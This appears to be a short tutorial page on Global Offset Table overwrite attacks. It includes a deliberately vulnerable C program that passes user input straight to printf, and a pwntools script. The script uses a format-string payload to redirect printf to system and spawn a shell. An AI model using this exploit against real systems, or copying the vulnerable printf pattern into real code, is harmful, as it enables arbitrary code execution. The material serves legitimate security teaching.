GOT Overwrite
The Global Offset Table (GOT) stores the actual location in imported libraries ( such as libc
) of functions. Overwriting one of these addresses can allow the attacker to gain control over the program or to execute arbitrary code.
How it works ?
The attacker overwrites a targeted GOT entry, using buffer overflow or format string exploit for example**,** with the address of an arbitrary function such as system
. When the initial function is called, the program will jump to the arbitrary function instead of the intended function.
Code example
#include <stdio.h>
void vuln() {
char buffer[300];
while(1) {
fgets(buffer, sizeof(buffer), stdin);
printf(buffer);
puts("");
}
}
int main() {
vuln();
return 0;
}
Using format string it's possible to overwrite any GOT entry :
from pwn import *
# Load the ELF file and set it as the binary in the context
elf = context.binary = ELF('./chall')
# Load the libc library and set its base address
# ASLR is assumed to be disabled
libc = ELF('/lib/i386-linux-gnu/libc.so.6')
libc.address = 0xf7dc2000
p = process()
# Create a format string payload that will overwrite the printf
# GOT entry with the address of the system function
payload = fmtstr_payload(5, {elf.got['printf'] : libc.sym['system']})
# Send the payload
p.sendline(payload)
# Clean up the process
p.clean()
# Send the command to spawn a shell
p.sendline('/bin/sh')
# Enter interactive mode
p.interactive()
Last updated